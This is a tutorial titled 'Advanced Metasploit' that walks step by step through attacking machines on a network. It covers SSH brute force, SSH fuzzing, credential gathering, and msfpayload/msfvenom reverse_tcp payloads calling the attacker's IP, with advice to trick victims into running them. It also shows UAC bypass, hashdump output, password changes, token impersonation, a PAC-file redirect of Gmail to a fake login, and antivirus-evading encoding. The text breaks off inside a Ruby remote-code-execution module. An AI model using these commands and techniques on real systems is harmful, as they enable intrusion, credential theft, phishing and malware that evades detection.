contents · 2017. 4. 3. · 3.a nop generator ... credential harvesting is a social engineering...

Contents Introduction ............................................................................................................................................................................... 3

1. AUXILIARY .............................................................................................................................................................................. 4

1.a Scanners ........................................................................................................................................................................... 4

1.b Fuzzers ............................................................................................................................................................................. 7

1.c Credential harvesting ..................................................................................................................................................... 11

2. POST EXPLOITATION ............................................................................................................................................................ 14

2.a privilege escalation ........................................................................................................................................................ 14

2.b IE proxy PAC ................................................................................................................................................................... 26

3. MISCELLANEOUS .................................................................................................................................................................. 34

3.a NOP generator ............................................................................................................................................................... 34

3.b encoders ........................................................................................................................................................................ 37

4. Advanced module/payload configuration options .............................................................................................................. 40

5. Writing custom Metasploit modules. .................................................................................................................................. 43

6. Stealthy techniques when using Metasploit. ....................................................................................................................... 48

Advanced Metasploit 3

Introduction Metasploit is an open source application for security that was created by HD in 2003. Many exploits are contained in

Metasploit, because Metasploit has a framework, which allows any user access to any modules desired. Metasploit has

the architecture shown below:

FIGURE 1: METASPLOIT ARCHITECTURE

At this time, I will explain how to use Metasploit to take over a computer by scanning SSH and then performing

BRUTEFORCE to find the username and password. I will also show how to perform FUZZING. Here I will also explain how

one can use ENCODER techniques to create a Trojan that is undetected by antivirus. I will also explain how a person can

use fake login techniques for credential harvesting. In addition, I will show how, when you have entered the target com-

puter, you can manipulate several processes with stealthy techniques when using Metasploit, taking the user token on the

target computer, changing the username and password, etc., and injecting it with techniques of privilege escalation. Final-

ly, I will I explain how to create a custom module on Metasploit and use NOP sled to make your exploits stable, and how

someone using PROXYPAC can steal your bank account.


1. AUXILIARY AUXILIARY is a collection of modules that do not use a payload. Functions of the auxiliary modules include port scanning,

fingerprinting, service scanners, etc. Auxiliary modules also include several different types of protocols, such as scanners,

network protocol fuzzers, wireless, and denial of service.

1.a Scanners This module, contained in auxiliary, scans to find the information on targets ranging from open ports to even identifying

the OS in use by the target. See the illustrations below:

FIGURE 2: SSH BRUTEFORCE

The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors.

This module has several features to scan applications such as DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, Net-

BIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMWare, and VNC. For this article, I’m scanning SSH, using the auxiliary

SSH module to scan and using brute force for the username and password. To get started, type msfconsole on the termi-

nal.

root@sungai:~# msfconsole

FIGURE 3: STARTING METASPLOIT


After Metasploit loads, I use the module ssh_login with the following command:

msf > use auxiliary/scanner/ssh/ssh_login

Then I set the target to be scanned with the command:

msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132

RHOSTS => 192.168.109.132

FIGURE 4: SETTING IP TARGET

After I use the ssh_login module, I must have a dictionary to brute-force the SSH login. To perform user configuration and

pass list using the existing dictionary, I use the following command:

msf auxiliary(ssh_login) > show options

FIGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY

I then use USERPASS_FILE options for setting the dictionary list:

msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/Metasploit-

framework/data/wordlists/root_userpass.txt


FIGURE 6: SETTING USERPASS_FILE

After setting wordlists to be used for brute force, I run that module with this command:

msf auxiliary(ssh_login) > run

Note: The more userpass wordlists are used, the longer the process.

Results of the scanning SSH will look more or less like the following image.

FIGURE 7: STARTING BRUTE FORCE SSH

You can see that the results are as shown below:

[*] 192.168.109.1:22 SSH - Starting brute force

[*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22)

at 2015-08-30 03:24:14 -0400

[+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com'

'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz) con-

text=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux lo-

calhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015

x86_64 x86_64 GNU/Linux '

IP Target 192.168.109.1, Port 22, has a user access name “cupenkz” with password ”it-trad.com.” After getting the target,

the following command can be used to do the checking:

msf auxiliary(ssh_login) > sessions -i

Note:

-i is the command for interacting with ID number

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------


2 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1)

3 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)

FIGURE 8: RESULT OF SSH BRUTEFORCE

After the session begins, you can directly interact with the target using the command:

msf auxiliary(ssh_login) > sessions -i 2

Note:

-i is the command for interact with ID number

The purpose of the command is to run session number 2.

FIGURE 9: RUNNING SESSION 2

After you get shell on the target, you only have access as a user, but you could gain root access if you know the vulnerabil-

ity in the OS.

1.b Fuzzers Fuzzing is a technique in which an attacker exploits the weaknesses of an application that is used by the target. Usually

these weaknesses could cause the target to crash, which can even provide access into the target terminal. In Metasploit,


there are several modules that can be used for such an application, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS.

However, not all versions of these applications be attacked using a fuzzer module contained in Metasploit.

This technique is illustrated below:

FIGURE 10: ILLUSTRATION OF FUZZING SSH

The illustration shows that, if a company has Wi-Fi access, it can be accessed by others and abused. Attackers can scan the

company’s computers. In addition, if the company has a vulnerability in its SSH application, SSH on its computers can be

targeted to cause a crash.

To start fuzzing, you must run Metasploit first with the command:


FIGURE 11: RUNNING METASPLOIT

After Metasploit runs, use the command below to run the SSH fuzzer.

msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt

msf auxiliary(ssh_version_corrupt) >

However, before using the ssh fuzzer module, maybe we should scan the target first, using the nmap simply to ascertain

whether the target is using SSH or not. I use the command:

root@sungai:~# nmap -sS -v -A 192.168.109.1

Note:

-sS is the command for scanning the TCP SYN packet


-v is the command for verbose (resulting in detailed scanning)

-A is the command for detecting the OS used, version, script scanning, and traceroute

Results of the scan are shown below:

FIGURE 12: HASIL SCANNING NMAP

You can see from the picture that the IP 192.168.109.1 is using OpenSSH, version 6.6.1, with port 22 open.

After viewing the information that is used by the SSH module fuzzer, you can use the command:

msf auxiliary(ssh_version_corrupt) > info

The following information can be seen:

MAXDEPTH specifications for testing on the target byte

RHOST is an IP target

RPORT is a port target.

Before running the SSH module fuzzer, I have to apply the settings for the MAXDEPT and RHOST as follows:


FIGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER

The picture above shows the settings for the specification of bytes sent, the target IP, and the target port.

To perform settings, use the command:

msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999

maxdepth => 999999999999

msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1

rhost => 192.168.109.1

After the settings are correct, you can run with this command:

msf auxiliary(ssh_version_corrupt) > run

FIGURE 14: SSH FUZZER RUNNING


The picture above shows Metasploit using fuzzing against the target, but not all versions of SSH have this vulnerability. So,

if SSH in the target does not crash, there is the possibility that SSH is already in the patch.

1.c Credential harvesting Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and

others. This technique has many variations through which an attacker can create a payload to get a username/password

login and other information. An illustration of credential harvesting is shown below.

FIGURE 15: CREDENTIAL HARVESTING

The image above shows that the attacker can retrieve user and password targets using AutoLogin if the target has Auto-

Login settings.

First, we must have access to a computer target for use in the credential harvesting technique.

I gain access using Meterpreter, as shown below:

FIGURE 16: METERPRETER CONNECTED

After connecting with Meterpreter, I run Meterpreter as a background service. Then I search the credential module using

the following command:

msf exploit(handler)> search credential

FIGURE 17: SEARCHING CREDENTIAL MODULE

In Metasploit, there are many module credentials, but I use the module

post/windows/gather/credentials/windows_autologin. To access this module, I use the following command:

msf exploit(handler)> use post/windows/gather/credentials/windows_autologin


FIGURE 18: USING MODULE POST/WINDOWS/GATHER/CREDENTIALS/WINDOWS_AUTOLOGIN

After that, I can see more options in this module with the command:

msf post(windows_autologin)> show options

FIGURE 19: SHOWING OPTION MODULE WINDOWS_AUTOLOGIN

The above picture shows an option contained in the module. Here I am just setting part of the session, which is used with

the command:

msf post(windows_autologin)>sessions -i

FIGURE 20: SEEING SESSION ACTIVE IN TARGET

msf post(windows_autologin)> set sessions 1

FIGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN

After setting the module, I run this module with the command:


msf post(windows_autologin)> exploit

FIGURE 22: EXPLOIT RUNNING

The illustration shows how the exploit reveals the password and username information contained on the target computer:

user: cupenkz

password [No Password!]

Domain: FATBOYGAG-SLIM

When the target computer does not have a set auto login, the exploit does not work and shows something like the image

below:

FIGURE 23: EXPLOIT NOT WORKING


2. POST EXPLOITATION Another technique that the attacker can use to gain further access to the target's internal network is packet sniffing. An

attacker can also put a backdoor to retain access to the target.

2.a privilege escalation This technique allows an attacker to take over the target computer by taking advantage of an exposed vulnerability. Once

the computer is taken over, the attacker tries to raise user access, as in the following illustration:

FIGURE 24: PRIVILEGE ESCALATION

In this example, my target is Windows 7 Ultimate 32 bit. To do the scanning to find the OS used, I use the command:

root@sunga : nmap –sS –v –A 192.168.130.1

FIGURE 25: SCANNING USE NMAP

Note:

-sS is the command for scanning by using the TCP SYN packet

-v is the command for verbose (resulting in detail scanning)

-A is the command for detecting the OS used, version, script scanning, and traceroute

The results are as shown below.


FIGURE 26: THE RESULT FROM SCANNING USE NMAP

To perform privilege escalation, I first made the application form execute the payload; then the target will be connected

with a computer attacker. I use msfpayload with the command:

sungati@root : msfpayload windows/Meterpreter/reverse_tcp

LHOST=192.168.130.128 LPORT=4444 x > /var/www/cupenkz.exe

FIGURE 27: LOADING MSFPAYLOAD TO MAKE A MALICIOUS FILE

Note:

- Msfpayload command creates a payload using reverse_tcp

- LHOST is an IP attacker

- LPORT is a computer port attacker

- X command creates an exe file named cupenkz.exe

After making the application payload, you need to trick the unsuspecting targets in order to use the payload silently, such

as by combining it with a program like crack or install autoscript usb, which is useful when installed in the target computer;

then the application will run. In this case, I just give an example of how best to move so that the application is executed

with the target.

After that, I run the exploit handler on a computer attacker, with the command:

FIGURE 28: USING EXPLOIT/MULTI/HANDLER IN COMPUTER ATTACKER


The function of the above command is that, when cupenkz.exe is executed with a target computer, the attacker computer

is ready to receive the payload and open a reverse connection from the target computer.

FIGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ.EXE

After setting the LHOST attacker on the computer, I run the command:

msf exploit(handler) > run

Then, when one of the files that we uploaded earlier (cupenkz.exe) is executed by the target, it will look like the image

above.

The above-owned user access is usually limited to the user, not the administrator or root.

FIGURE 30: ACCESS IS DENIED

I tried to do getsystem when it was targeted with the command:

Meterpreter > getsystem

FIGURE 31: GETSYSTEM FAIL

The above condition is that we have only limited access to user, and cannot access to the system; I view it with the com-

mand:

Meterpreter > getuid


FIGURE 32: THE POSITION OF THE CURRENT USER

After that, I review the information contained in getsystem with the command:

Meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h Help Banner.

-t <opt> The technique to use. (Default to ”0”).

0. All techniques available

1. Service - Named Pipe Impersonation (In Memory/Admin)

2. Service - Named Pipe Impersonation (Dropper/Admin)

3. Service - Token Duplication (In Memory/Admin)

There are three functions that are used to increase user access to a target computer, among others.

The first function is 1. Service - Named Pipe Impersonation (In Memory/Admin), where the attacker does the exploit on

the target computer, usually as a local exploit. Local exploits are used to take over the target computer in full. I first run

Meterpreter as background, with the command:

FIGURE 33: RUNNING METERPRETER AS BACKGROUND

msf exploit(handler) > search uac


FIGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC

msf exploit(handler) > use/exploit/windows/local/bypassuac

Above I’m searching a Windows 7 computer with the local exploit with the name bypass UAC, and then I set the session on

a local exploit.

FIGURE 35: SETTING SESSION

msf exploit(bypassuac) > set SESSION 2

After the setting session is complete, I run the exploit locally with the command:

msf exploit(bypassuac) > exploit


FIGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL WINDOWS 7

Session 2 has been created by using local exploit bypassuac to replace the session with the command:

msf exploit(bypassuac) > sessions -i

msf exploit(bypassuac) > sessions –i 2

FIGURE 37: CHANGING SESSION

msf exploit(bypassuac) > sessions -i 2

After running this, I will try to identify whether user access is no longer restricted.

FIGURE 38: ACCESS BY USING GETSYSTEM

The picture above shows where the system is created using a local exploit. Here I took over the account system; in other

words, the root account. If you have the root account, then you can take over the entire contents of the target computer.


UAC (user account control) is a security feature in Windows. Each function that appears to be accessing files or applica-

tions on a Windows system will display a warning from UAC asking for confirmation as a security feature. This feature can

be deactivated (disabled) so you are not disturbed by the frequent Windows question, "Do you want to allow the follow-

ing program to install software on this computer?"

UAC/user account control is a technology and security infrastructure introduced with Microsoft’s Win-

dows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in

Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limit-

ing application software to standard user privileges until an administrator authorizes an increase or ele-

vation. In this way, only applications trusted by the user may receive administrative privileges, and mal-

ware should be kept from compromising the operating system. In other words, a user account may have

administrator privileges assigned to it, but applications that the user runs do not inherit those privileges

unless they are approved beforehand or the user explicitly authorizes it.

Why do we need an exploit to bypass UAC? The exploit is a technique by which we can take over the targeted computer.

There are two types of exploit attacks, namely remote and local. Usually a remote exploit is used when an application on

the target has a vulnerability that can be accessed remotely (via the port connection). In this example, we use SSH, FTP,

etc. A local exploit usually finds the cracks in the application contained on the targeted computer. See the illustration be-

low.

FIGURE 39: REMOTE EXPLOIT

The figure shows a remote exploit, with the attacker scanning SSH on the target and finding a SSH vulnerability. Then the

attacker can attack using a remote SSH exploit.

FIGURE 40: LOCAL EXPLOIT

The illustration shows the attacker performing remote ssh in the open and seeing that the target computer’s UAC feature

can be bypassed, so the user privileges can be raised, and the attacker uses the local exploit bypassuac on the target com-

puter. This shows the difference between a local exploit and a remote exploit.

Bypass UAC is a technique that raises the standard user access rights to be an administrator without requiring authoriza-

tion from the target. In this example, I used the payload bypassUAC on Metasploit. This technique will create an executa-

ble file and find the Windows directory to which to upload it. Then the file is injected and, if the file is executed, it will

change the permissions of the user to be an administrator. An illustration can be seen in the figure below:


FIGURE 41: BYPASSUAC

The illustration shows approximately how UAC is bypassed:

1. Meterpreter connect—attacker must have a connection to the target through Meterpreter.

2. Upload malicious—attacker creates a malicious file using bypassuac, then uploads it to the target computer and

puts it in a specific directory on system target.

3. Execute file—attacker executes files that have been created earlier.

4. Create session for Meterpreter—malicious file creates a session that is integrated through Meterpreter.

The second function is 2. Service - Named Pipe Impersonation (Dropper / Admin)

While the above function is aimed at a file system on the target computer, here I use Windows API with railgun, which is

one of the applications contained in Metasploit. Railgun is an application that can interact and gain full access using Win-

dows API.

For information contained in the Windows API documentation on the website, you can look at msdn.microsoft.com, be-

cause I am not going to explain much here about the API function in Windows.

Here I use an IRB shell to run railgun, with the command:

Meterpreter > irb

[*] Starting IRB shell

[*] The 'client' variable holds the Meterpreter client

After that, I see what DLLs are used in this module that already exist in railgun, with the command:

>> client.railgun.known_dll_names

=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32",

"shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]

>>

FIGURE 42: DLLS USED IN RAILGUN

The above are the default 12 DLLs that can be used in railgun; here I use netapi32 to change user admin on the target

computer.

First, I must check what user is already present on the target with the command:

Meterpreter > hashdump

ad-

min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::


Administra-

tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

cu-

penkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9:::

fat-

boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Updatu-

sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB51400C232862211DB317DA0793BC9

The above shows six users who are on the target computer; now I'll try change the password cupenkz using the following

command:

>> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz",

"cupenkz123")

Note:

- client.railgun.netapi32.NetUserChangePassword <= command to use neta-

pi32.dll and use the function NetUserChangePassword

- nil <= domainname

- cupenkz <== username

- cupenkz <== oldpassword

- cupenkz123 <== newpassword

FIGURE 44: COMMAND NETUSERCHANGEPASSWORD, NETAPI32 SUCCESSFULLY

To check if the cupenkz password has been replaced or not, I checked with the command:

Meterpreter > hashdump


ad-

min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::

Administra-

tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

cu-

penkz:1004:aad3b435b51404eeaad3b435b51404ee:cd84df77d079b66945e777398b4d4937:::

fat-

boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Updatu-

sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

FIGURE 45: CUPENKZ PASSWORD HAS BEEN REPLACED TO BECOME CD84DF77D079B66945E777398B4D4937

You can see the cupenkz password before is cd84df77d079b66945e777398b4d4937; the password that was changed ear-

lier is ebb51400c232862211db317da0793bc9.

For more details, I look at the functions that are on netapi32.dll in this directory:

root@sungai:cd /usr/share/Metasploit- frame-

work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def

root@sungai:/usr/share/Metasploit- frame-

work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def# less

def_netapi32.rb

see function NetUserChangePassword

dll.add_function('NetUserChangePassword', 'DWORD', [

["PWCHAR","domainname","in"],

["PWCHAR","username","in"],

["PWCHAR","oldpassword","in"],

["PWCHAR","newpassword","in"]

])

Above is a function that allows the user to change the password using railgun with netapi32.dll. After you change the user,

you can only login using RDP. This technique could possibly be used when you are a user/guest, but you want to get more

access to the admin/root; then you can just replace the users, or create new functions to be added as admin.


For the third function 3: Service - Token Duplication (In Memory/Admin), which involves stealing the token in the system, I

am using an application on Metasploit incognito to steal the token on the target system. Use the command:

Meterpreter > use incognito

Loading extension incognito...success.

Meterpreter >

FIGURE 46: USING INCOGNITO

Then I check the username used in this Meterpreter, with the command:


Server username: NT AUTHORITY\SYSTEM

Now I see in list_token anything contained on the system with the command:

Meterpreter > list_tokens -u

Delegation Tokens Available

========================================

fatboygag-slim\fatboygagslim

NT AUTHORITY\LOCAL SERVICE

NT AUTHORITY\NETWORK SERVICE

NT AUTHORITY\SYSTEM

Impersonation Tokens Available

========================================

fatboygag-slim\UpdatusUser

NT AUTHORITY\ANONYMOUS LOGON


FIGURE 47: LISTING TOKENS USED IN TARGET

Note:

-u command for see list token

There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but

it is not permanent, unlike the IMPERSONATION token.

After that, I would choose the token using the command:

Meterpreter > impersonate_token

Usage: impersonate_token <token>

Instructs the Meterpreter thread to impersonate the specified token. All oth-

er actions will then be made in the context of that token.

Hint: Double backslash DOMAIN\\name (Meterpreter quirk)

Hint: Enclose with quotation marks if name contains a space

Meterpreter >

FIGURE 48: IMPERSONATE_TOKEN

Here I will try to use the user token "fatboygag-slim fatboygagslim \\", with the command

Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim

[+] Delegation token available


[+] Successfully impersonated user fatboygag-slim\fatboygagslim

FIGURE 49: IMPERSONATE_TOKEN SUCCESSFULLY

To check whether the token has been successfully used, I use the command:


Server username: fatboygag-slim\fatboygagslim

FIGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY

From the above explanation, we see that, when we are connected to the target, then we can use the existing user token

on the computer by using incognito.

2.b IE proxy PAC This is a technique in which the attacker can insert a fake login on a website by performing exploitation on IE so that,

when the target is open on the web, the password will be captured by the attacker, as shown below.

FIGURE 51: IE PROXY PAC

To run this technique, you should already have access to the target computer. Here, I use Meterpreter on the target using

the exploit me08_067_netapi, as shown in the following illustration:


FIGURE 52: METERPRETER USING EXPLOIT ME08_067_NETAPI

After I have opened the target with Meterpreter, I look for the ie_proxypac exploit with this command:

msf exploit(ms08_06_netapi) > search ie_proxy

FIGURE 53: SEARCHING IE_PROXY MODULE

After searching, there is one module for ie_proxy, and then I use the command:

msf exploit(ms08_06_netapi) > use post/windows/manage/ie_proxypac


FIGURE 54: INFO MODULE IE_PROXYPAC

The picture above shows a brief description of the module ie_proxypac. To run the module, I see the first option is to look

at at the previous settings. I use the command:

msf post(ie_proxy) > show options

FIGURE 55: OPTION MODULE IE_PROXYPAC

In the module above, there are five options that must be set, but for AUTO DETECT and DISABLE PROXY I’m using the de-

fault. For the REMOTE_PAC, the setting will load a .pac file on remote, and LOCAL_PAC is a setting where there is a .pac

file on the computer attacker, which is a previously made .pac file on the local computer. I put the path

/var/www/cupenkz.pac .pac file to fill the .pac file, as shown below:


FIGURE 56: CONTENT FILE CUPENKZ.PAC

The picture above shows a .pac file that will open www.gmail.com and the target computer will be redirected to the IP

192.168.109.130. The IP is already in post fake login.

After that, I did the setting for LOCAL_PAC with the command:

msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac

FIGURE 57: SETTING LOCAL_PAC

After setting the file .pac , I set a SESSION number on which to run the file. However, before that I check that SESSION is at

the target using the command.

msf post(ie_proxy) > sessions -i

Note:

-i is the command for interact with ID number


FIGURE 58: CHECKING ACTIVE SESSION

A session can be active only once; after that, do the settings with the command:

msf post(ie_proxy) > set SESSIONS 1

Note:

-i is the command for interacting with the ID number

FIGURE 59: SETTING SESSION USE NO 1

After all the settings are done, then run the command:

msf post(ie_proxy) > exploit

FIGURE 60: RUNNING IE_PROXYPAC

The picture above shows the information that the .pac file from the local computer will upload to the target computer

with the following command:

C:\Documents and settings\NetworkService\Application Data\hFTVnk.pac


To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, chose menu Internet

Options, and select the option as shown below.

FIGURE 61: INTERNET OPTION IE

After that, I choose Connection and LAN setting

The result obtained can be seen in the following settings.


FIGURE 62: SETTING IE INTERNET OPTION

The picture above shows setting the proxypac on IE, where the file hFTVnk.pac is configured as the IE proxy pac. To verify

whether the file proxy is mounted, run IE and open www.gmail.com, as shown below:

FIGURE 63: DISPLAYING IE ON TARGET WHEN IT OPENS WWW.GMAIL.COM


To better ascertain whether hF Vnk.pac is loaded or not, I use View Source and look for the link authentication used, as

shown below:

FIGURE 64: VIEWING SOURCE PROXYPAC

As can be seen, www.gmail.com is the link that is opened in IE, because the attached file authentication cupenkz.html, if

there is a login it, will immediately redirect to www.mail.google.com.

The advantage of using this technique is the URL address to the web browser is almost similar to the original, so it is less

likely to be suspected.


3. MISCELLANEOUS A function of this technique is bypassing security contained in the target. As a small example, it can bypass antivirus and

IDS (instruction detecting system).

3.a NOP generator NOP (no operation) is a technique by which NOP commands are used to add some bytes to the exploit payload. The func-

tion of adding bytes is to solve the problem of finding the original EIP address of a buffer, effectively increasing the target

area.

As an example from everyday life is a glass that can be filled with 500ml of water. If we fill it with 501ml water, the water

will be spilled out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of

data is filled with 501 bytes, causing it to crash. Think of it this way: After the fuzzing finds that the EIP application lies in

510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs.

For an illustration of how NOP works, see the diagram below:

FIGURE 65: NOP WORKING

The above illustration shows how NOP works: NOP makes a jump to the next address so that the end of the NOP com-

mand calls the shellcode.

For using the NOP Generator, you must already know the NOP module contained in Metasploit.



FIGURE 66: START METASPLOIT

Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command:

msf > use payload/windows/shell_bind_tcp

FIGURE 67: USE SHELL_BIND_TCP PAYLOAD

As can be seen from the picture above, shell_bind_tcp can make a connection back from the target when the target exe-

cutes the payload, and then the target will be connected to the computer attacker using attacker port 4444. To execute

the payload, use the command below:

msf payload (shell_bind_tcp) > generate


FIGURE 68: GENERATE PAYLOAD

It can be seen from the results that the payload generated little endian or so-called shellcode that totals 341 bytes. Here is

a NOP function can add value to the shellcode. To try it out, can use the command.

msf payload (shell_bind_tcp) > generate -s 14

Note:

-s is the command to add how many bytes on NOP


FIGURE 69: GENERATE USE -S NOP SLED

The shellcode, as can be seen from the above, now contains 355 bytes. The “-s command 14” adds a NOP sled of 14 bytes

to the shellcode. The function of the NOP sled is the same thing that I illustrated by the water in a glass. If the shellcode

does not crash the application being fuzzed, the NOP sled is one way in which values can be added to exploit the shellcode

running.

3.b encoders This is a technique that is used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan and is not

detected by anti-virus software.

At this time, I will make a payload.exe using msfvenom with the command:

root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp

LHOST=192.168.109.130 LPORT=6969 -x -f exe >

/root/Desktop/cupu.exe

Note:

-p is the command to choose the payload used

-x is the command to specify a custom executable file to use as a template

-f is the command for an output format file to be produced

FIGURE 70: CREATE FILE CUPU.EXE

You can see in the picture above that msfvenom makes a file with the name “cupu.exe” by using the payload win-

dows/Meterpreter/reverse_tcp and, if this file is executed in the target, the target will be connected to the attacker's IP

192.168.109.130 using Port 6969.


Here I will check the cupu.exe file by using www.virustotal.com:

FIGURE 71: RESULT SCANNING CUPU.EXE

The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. However, here I am

trying to encode the cupu.exe file to cupenkz.exe to be undetected by AV software. Use the command:

root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp

LHOST=192.168.109.130 LPORT=6969 -x -f exe -e

x86_shikata_ga_nai> /root/Desktop/cupenkz.exe

Note:

-p is the command for choosing what payload is used

-x is the command for specifying a custom executable file to use as a tem-

plate

-f is the command for output format file, yang akan di hasilkan

-e is the command for choosing the encryption you want to be used

To the above command, I add the encode options -e x86_shikata_ga_nai, and the results of the cupenkz.exe file on scan-

ning www.virustotal.com, as shown below.

http://www.virustotal.com/


FIGURE 72: RESULT SCANNING FILE CUPENKZ.EXE AT VIRUSTOTAL.COM

The picture above shows that the cupenkz.exe file as completely undetectable by antivirus software, using shikata_ga_nai

encoding.


4. Advanced module/payload configuration options These are techniques whereby, when we're loading a module, we can set parameters in advance, by which I mean that it

can automatically make an order in the attack. For example, use this command:

msf auxiliary (ssh_login) > show advanced

FIGURE 73: SETTING SHOW ADVANCED MODULE SSH_LOGIN

The above is an advanced setting for auxiliary ssh_login scanners; it can be seen that there are some settings and also a

description. To change the settings, use the command:

msf auxiliary (ssh_login) > set Name CurrentSetting

example:

msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config

FIGURE 74: CHANGE SETTING AN AUTORUNSCRIPT

enum_conf command is to take some of the configuration information contained on target; to check whether the setting

has been changed or not , use a command like this:

msf auxiliary (ssh_login) > show advanced


FIGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED

You can see in the picture above that the setting for AutoRunScript has turned into post/linux/gather/enum_config. This

affects the actual setting when you want to attack with their own methods, because usually this method depends on the

situation and conditions in the field.

AutoRunScript can be seen from the results of the run, as shown below:

FIGURE 76: RESULT FROM AUTORUNSCRIPT

The picture above shows that the OS used by the target is Fedora 21 and there is some log information that has been

stored on the computer attacker. By using AutoRunScript, you can make an attack and obtain the information contained in

the target. Examples of the information obtained are shown below.


FIGURE 77: RESULT LOG FROM AUTORUNSCRIPT

The picture above shows the results log on Samba configuration, and shows where the log files are stored by the comput-

er attacker.


5. Writing custom Metasploit modules. Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to make

the module, you should understand the programming language Ruby. Here I have an example exploit that I took from ex-

ploit-db.com:

FIGURE 78: EXPLOIT FROM EXPLOIT-DB.COM

The source above is made by w3tw0rk, who made an exploit by utilizing the vulnerability of applications Pitbul IRC Bot.

Here's the source:

_________________________________________________snip_______________________________________________

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})

super(update_info(info,

'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',

'Description' => %q{

This module allows remote command execution on the w3tw0rk / Pitbul IRC

Bot.

},

'Author' =>

[

'Jay Turla'

],

'License' => MSF_LICENSE,

'References' =>

[

[ 'OSVDB', '120384' ],

[ 'EDB', '36652' ]

],

'Platform' => %w{ unix win },


'Arch' => ARCH_CMD,

'Payload' =>

{

'Space' => 300, # According to RFC 2812, the max length message is 512,

including the cr-lf

'DisableNops' => true,

'Compat' =>

{

'PayloadType' => 'cmd'

}

},

'Targets' =>

[

[ 'w3tw0rk', { } ]

],

'Privileged' => false,

'DisclosureDate' => 'Jun 04 2015',

'DefaultTarget' => 0))

register_options(

[

Opt::RPORT(6667),

OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])

], self.class)

end

def check

connect

res = register(sock)

if res =~ /463/ || res =~ /464/

vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

return Exploit::CheckCode::Unknown

end

res = join(sock)

if !res =~ /353/ && !res =~ /366/

vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']}

channel")


return Exploit::CheckCode::Unknown

end

quit(sock)

disconnect

if res =~ /auth/ && res =~ /logged in/

Exploit::CheckCode::Vulnerable

else

Exploit::CheckCode::Safe

end

end

def send_msg(sock, data)

sock.put(data)

data = ""
